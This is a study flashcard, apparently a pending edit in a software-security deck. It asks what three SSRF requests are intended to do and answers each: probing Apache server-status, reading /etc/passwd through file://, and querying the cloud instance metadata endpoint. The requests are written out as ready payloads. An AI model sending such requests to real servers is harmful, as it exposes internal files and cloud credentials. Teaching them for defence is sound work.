Review Note
Last Update: 04/27/2023 06:11 AM
Current Deck: Software Security
New Card (Unpublished)
Pending Suggestions
Field Change Suggestions:
Front
Commit #1538
What are the following malicious SSRF HTTP requests intended to do?
1. GET /?url=http://localhost/server-status HTTP/1.1
2. GET /?url=file:///etc/passwd HTTP/1.1
3. GET /?url=http://169.254.169.254/latest/meta-data HTTP/1.1
Back
Commit #1538
1. Apache server endpoint to return server status (e.g., services running on the server)
2. Read a local file (/etc/passwd)
3. AWS EC2 and OpenStack cloud endpoint to get metadata for an instance